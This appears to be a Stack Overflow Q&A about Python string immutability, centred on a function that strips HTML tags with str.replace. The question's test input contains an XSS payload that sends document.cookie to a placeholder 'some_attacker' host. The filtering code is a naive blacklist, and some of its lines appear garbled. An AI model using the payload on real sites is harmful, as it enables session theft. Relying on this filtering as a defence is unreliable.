Reputation: 1055
I am trying to replace some key words in a string. Here is my function:
def clean_code(input):
    input.replace('<script>', " ")
    input.replace('</script>', " ")
    input.replace('<a href>', " ")
    input.replace('</a>', " ")
    input.replace('>', ">")
    input.replace('>', "<")
    return input
Here is the rest of my code, including the string:
string1 = "This blog is STUPID! >\n" \
"<script>document.location='http://some_attacker/cookie.cgi?"\
" +document.cookie </script>"
print '\nstring1 cleaned of code'
print '------------------------'
print clean_code(string1)
My output is as follows, and I'm not sure why nothing has changed:
string1 cleaned of code
------------------------
This blog is STUPID! >
<script>document.location='http://some_attacker/cookie.cgi? +document.cookie </script>
Upvotes: 2
Views: 8940
Reputation: 45542
Strings are immutable in Python. input.replace('</a>', " ") does not alter input. You need to assign the result back to input.
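A minimal sketch of the difference, using made-up variable names (original, unchanged, cleaned) that are not from the question:

```python
original = "<script>alert(1)</script>"

# Calling replace() and discarding its return value leaves the string as it was.
original.replace("<script>", " ")
unchanged = original

# Binding a name to the returned string keeps the substitution.
cleaned = original.replace("<script>", " ")
cleaned = cleaned.replace("</script>", " ")

print(unchanged)
print(cleaned)
```

The first print shows the untouched input; only the chain of assignments produces a changed string.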
But really you should use a parser like BeautifulSoup or lxml.
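To give a rough idea of the parser approach without extra dependencies, here is a sketch that swaps in the standard library's html.parser (Python 3) instead of BeautifulSoup or lxml. The class TextOnly and the function strip_markup are hypothetical names, and dropping everything inside script elements is an assumption about what "cleaning" should mean here:

```python
from html.parser import HTMLParser


class TextOnly(HTMLParser):
    """Hypothetical helper: collects text that is not inside a <script> element."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.parts = []
        self.in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # Keep text only when we are outside a script element.
        if not self.in_script:
            self.parts.append(data)


def strip_markup(text):
    """Return the text content of `text`, with tags and script bodies dropped."""
    parser = TextOnly()
    parser.feed(text)
    parser.close()  # flush any text still buffered by the parser
    return "".join(parser.parts)


print(strip_markup("Hi <a href='x'>there</a><script>alert(1)</script>!"))
```

Because the parser tracks tags rather than exact substrings, variations such as extra attributes on a tag do not need a separate rule. It is not a sanitizer for untrusted HTML; a maintained library is the safer choice for that.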
Upvotes: 5
Reputation: 1570
String.replace returns a new string that is the result of the substitution, but does not change the original. To keep the change, you have to assign the return value back to the variable, like so:
myString = myString.replace("foo", "bar")
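Furthermore, input.replace('<a href>', " ") will only replace the exact substring "<a href>". Python's replace does not accept regular expressions, so to remove actual links, use the re module instead: after import re, try input = re.sub(r'<a\s[^>]*>', " ", input).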
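Since str.replace only matches literal substrings, matching an opening anchor tag with arbitrary attributes needs re.sub. A small sketch, where ANCHOR_OPEN and strip_anchor_tags are illustrative names and the pattern is a rough approximation rather than a full HTML grammar:

```python
import re

# Matches an opening <a ...> tag with any attributes (approximate pattern).
ANCHOR_OPEN = re.compile(r"<a\s[^>]*>")


def strip_anchor_tags(text):
    """Replace opening and closing anchor tags with a single space each."""
    text = ANCHOR_OPEN.sub(" ", text)
    # The closing tag is a fixed string, so a plain replace is enough.
    return text.replace("</a>", " ")


print(strip_anchor_tags('see <a href="http://example.com">this</a> now'))
```

Note that both calls return new strings, so the results are assigned or returned rather than discarded.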
Upvotes: 3
Reputation: 34698
.replace is not an in-place mutation. Try this:
def clean_code(input):
    for tokens in [('<script>', " "), ('</script>', " "), ('<a href>', " "),
                   ('</a>', " "), ('>', ">"), ('>', "<")]:
        input = input.replace(tokens[0], tokens[1])
    return input
Upvotes: 3
Reputation: 76755
Python strings are immutable:
input = input.replace('<script>', " ")
input = ...
The documentation describes replace as follows: "Return a copy of string str with all occurrences of substring old replaced by new."
Upvotes: 8